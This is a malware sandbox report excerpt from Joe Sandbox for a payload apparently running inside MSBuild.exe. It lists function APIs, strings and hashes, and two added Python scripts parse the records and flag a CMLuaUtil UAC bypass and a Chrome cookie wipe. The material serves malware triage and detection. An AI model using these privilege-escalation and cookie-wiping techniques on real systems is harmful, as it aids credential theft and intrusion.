• Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
• Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
• Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
APIs
• _ValidateLocalCookies.LIBCMT ref: 1000339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
• _ValidateLocalCookies.LIBCMT ref: 10003431
• __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
• _ValidateLocalCookies.LIBCMT ref: 100034B1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
• Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
• Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
• Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
• __alloca_probe_16.LIBCMT ref: 0044FF58
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
• __freea.LIBCMT ref: 0044FFC4
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID: u;~/
• API String ID: 313313983-1979702588
• Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
• Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
• Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
• Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
APIs
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
• PathFileExistsA.SHLWAPI(?), ref: 0040B779
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
• Opcode ID: 9f830491a43924aacef6b89cd49d596dbc1a7be0786a055df37cbe98fa0b0cad
• Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
• Opcode Fuzzy Hash: 9f830491a43924aacef6b89cd49d596dbc1a7be0786a055df37cbe98fa0b0cad
• Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
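Records like the one above (the function that reads the Cookies entry from HKCU\...\User Shell Folders, expands it and tests whether the path exists, alongside the "[IE cookies cleared!]" strings) are what an analyst pivots on: the API String ID and Opcode ID identify the same routine across dumps and samples, and the snapshot name ties a routine to a process and image base. The following parser is an added example, not part of this report or of Joe Sandbox's tooling; the function and key names are my own. Its SAMPLE input is constructed from two records on this page (the cookie routine in the image at 0x400000 and a CRT routine in the DLL at 0x10000000, both in PID 10) and deliberately keeps one "Download File" link remnant so the cleanup step is exercised.

```python
"""Parse per-function records of a Joe Sandbox report (the APIs, Memory Dump Source
and Similarity blocks on this page) and pivot on them.  Added example, not part of
the report or Joe Sandbox; SAMPLE is built from two records on this page."""
import re

SAMPLE = r"""
APIs
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
• PathFileExistsA.SHLWAPI(?), ref: 0040B779
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
• Opcode ID: 9f830491a43924aacef6b89cd49d596dbc1a7be0786a055df37cbe98fa0b0cad
• Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
APIs
• _ValidateLocalCookies.LIBCMT ref: 1000339B
• __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
• Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
# "• [Part of subcall function ADDR: ]Name.MODULE[(args),] ref: ADDR"
API_RE = re.compile(r"^• (?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<name>[^.(\s]+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^• (?P<key>[^:]+):\s?(?P<value>.*)$")
SRC_RE = re.compile(r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>true|false)$")
# Snapshot names on this page have the shape hcaresult_<pid>_<n>_<imagebase>_<process>.jbxd
SNAP_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_\d+_(?P<base>[0-9A-Fa-f]+)_(?P<proc>.+)\.jbxd$")


def parse_records(text):
    """One dict per record; 'Instruction Fuzzy Hash' is the last field and closes a record."""
    records, cur, section = [], None, None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if cur is None:
            cur = {"apis": [], "associated": [], "strings": [], "yara": False}
            records.append(cur)
        if line in SECTIONS:
            section = line
            cur["yara"] |= line == "Yara matches"      # header only appears when the region has matches
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError(f"unparsed API line: {line}")
            cur["apis"].append({"name": m["name"], "module": m["module"], "ref": int(m["ref"], 16),
                                "args": m["args"].split(",") if m["args"] else [], "subcall_of": m["sub"]})
            continue
        m = KV_RE.match(line)
        if not m:
            raise ValueError(f"unparsed line in {section!r}: {line}")
        key, value = m["key"], m["value"].strip()
        if key == "Source File":
            s = SRC_RE.match(value)
            cur.update(source_file=s["file"], offset=int(s["offset"], 16), based_on_pe=s["pe"] == "true")
        elif key == "Associated":
            cur["associated"].append(value.removesuffix("Download File").strip())  # drop the link remnant
        elif key == "Snapshot File":
            s = SNAP_RE.match(value)
            cur.update(pid=int(s["pid"]), image_base=int(s["base"], 16), process=s["proc"])
        elif key == "String ID":
            cur["strings"] = [x for x in value.split("$") if x]   # the report joins strings with '$'
        else:
            cur[key] = value                       # API ID, API String ID, Opcode ID, ...
            if key == "Instruction Fuzzy Hash":    # last field of a record
                cur = None
    return records


def find_by_string(records, needle):
    return [r for r in records if any(needle in s for s in r["strings"])]


def find_by_api(records, api_name):
    return [r for r in records if any(a["name"] == api_name for a in r["apis"])]


def by_image(records):
    """Group by (process, image base): the payload at 0x400000 and the DLL at 0x10000000 share PID 10."""
    out = {}
    for r in records:
        out.setdefault((r["process"], r["image_base"]), []).append(r)
    return out
```

Feed it the text of the whole disassembly section and `find_by_string(recs, "IE cookies")` returns the record above, whose `API String ID` (1133728706-4073444585) can then be searched for in other reports; `find_by_api(recs, "send")` or `"RegEnumKeyExW"` lists the routines that touch the network or walk registry keys, and `by_image` keeps the injected payload apart from the DLL loaded into the same MSBuild process.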
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
• Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
• Opcode Fuzzy Hash: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
• Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
• int.LIBCPMT ref: 0040FC0F
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FC4B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: P[G
• API String ID: 2536120697-571123470
• Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
• Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
• Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
• Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
APIs
  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
• _free.LIBCMT ref: 100092AB
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 100092B6
• _free.LIBCMT ref: 100092C1
• _free.LIBCMT ref: 10009315
• _free.LIBCMT ref: 10009320
• _free.LIBCMT ref: 1000932B
• _free.LIBCMT ref: 10009336
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
• Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
• Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
APIs
  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
• _free.LIBCMT ref: 0044FD29
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 0044FD34
• _free.LIBCMT ref: 0044FD3F
• _free.LIBCMT ref: 0044FD93
• _free.LIBCMT ref: 0044FD9E
• _free.LIBCMT ref: 0044FDA9
• _free.LIBCMT ref: 0044FDB4
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                                            APIs
                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
                                                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                            • API String ID: 3851391207-1840432179
                                                                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                            • String ID: H]G
                                                                                                                                            • API String ID: 2536120697-1717957184
                                                                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                            Strings
                                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                            • API String ID: 2018770650-304995407
                                                                                                                                            • Opcode ID: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                                            • Opcode Fuzzy Hash: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
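Two of the function blocks above carry the behaviour a triage analyst actually cares about, and both are only recognisable from the API plus string pair: CoGetObject next to the "[+] ucmCMLuaUtilShellExecMethod" / "[+] ShellExec" strings is the debug output of UACMe's CMLuaUtil method, i.e. the CMSTPLUA elevated-COM UAC bypass, and DeleteFileA next to the Chrome "Cookies" path is the cookie wipe that forces the victim to log in again while the keylogger runs. The script below is an added example, not Joe Sandbox code and not part of this report: it parses the plain-text layout of these per-function blocks (APIs / Strings / Similarity) and applies exactly those two rules. SAMPLE is constructed from the blocks on this page, trimmed; the rule names are ours.

```python
"""Flag sample-specific capabilities in Joe Sandbox function summaries.

Added example, not Joe Sandbox code. Rules are (API name, string) pairs so
that CRT/STL blocks (_free, std::_Lockit, the CorExitProcess probe) do not
fire on a single common API. SAMPLE is constructed from this page's blocks.
"""
import re
from dataclasses import dataclass, field


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)   # e.g. "CoGetObject.OLE32"
    strings: set = field(default_factory=set)  # Strings section + String ID
    opcode_id: str = ""


# (rule name, API names (any must appear), string fragments (all must appear))
RULES = [
    ("uac_bypass_cmlua_shellexec", {"CoGetObject"},
     ["ucmCMLuaUtilShellExecMethod"]),
    ("chrome_cookie_wipe", {"DeleteFileA", "DeleteFileW"},
     ["\\Google\\Chrome\\User Data\\Default\\Cookies"]),
]

SECTIONS = {"APIs": "apis", "Strings": "strings", "Similarity": "similarity",
            "Memory Dump Source": None, "Joe Sandbox IDA Plugin": None,
            "Yara matches": None}
# "Part of subcall function 00406764: CoGetObject.OLE32(?,...), ref: ..."
API_LINE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\S+?)(?:\(|\s+ref:)")


def parse_blocks(text):
    """Split report text into FunctionBlocks; a block ends at its fuzzy hash."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:                   # section header
            section = SECTIONS[line]
            if current is None:
                current = FunctionBlock()
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "apis":
            m = API_LINE.match(body)
            if m:
                current.apis.append(m.group(1))
        elif section == "strings":             # "<string>, xrefs: 0040B2AF"
            current.strings.add(body.rsplit(", xrefs:", 1)[0])
        elif section == "similarity":
            key, _, value = body.partition(":")
            value = value.strip()
            if key == "String ID" and value:   # "$"-joined string list
                current.strings.update(value.split("$"))
            elif key == "Opcode ID":
                current.opcode_id = value
            elif key == "Instruction Fuzzy Hash":
                blocks.append(current)         # last line of every block
                current, section = None, None
    if current is not None and (current.apis or current.strings):
        blocks.append(current)                 # trailing, unterminated block
    return blocks


def scan(blocks, rules=RULES):
    """Return (rule name, opcode id) for every block that matches a rule."""
    findings = []
    for b in blocks:
        api_names = {a.split(".")[0] for a in b.apis}   # drop ".OLE32" etc.
        for name, apis, needles in rules:
            if api_names & apis and all(any(n in s for s in b.strings) for n in needles):
                findings.append((name, b.opcode_id))
    return findings


# Constructed from this page's blocks (trimmed); the third block is CRT noise.
SAMPLE = r"""
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• CoUninitialize.OLE32 ref: 0040688E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
• Instruction Fuzzy Hash: A001C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
• GetLastError.KERNEL32 ref: 0040B2EE
Strings
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
• [Chrome Cookies found, cleared!], xrefs: 0040B314
• UserProfile, xrefs: 0040B2B4
Similarity
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• Opcode ID: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
• Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000), ref: 004425F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
Similarity
• String ID: CorExitProcess$mscoree.dll
• Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
"""

if __name__ == "__main__":
    for rule, opcode in scan(parse_blocks(SAMPLE)):
        print(f"{rule:28s} opcode {opcode[:16]}...")
```

The mscoree.dll / CorExitProcess lookup in the third block is the MSVC CRT's normal exit path, and the _free and std::_Lockit blocks are runtime code, which is why the rules key on an API together with a string rather than on a single API. The Strings-only block carrying Rmc-QM0FWK is a natural candidate for a third, string-only rule on the Rmc- prefix if you extend this.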
                                                                                                                                            Strings
                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00406927
                                                                                                                                            • BG, xrefs: 00406909
                                                                                                                                            • Rmc-QM0FWK, xrefs: 0040693F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$Rmc-QM0FWK$BG
                                                                                                                                            • API String ID: 0-1142441036
                                                                                                                                            • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                            • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
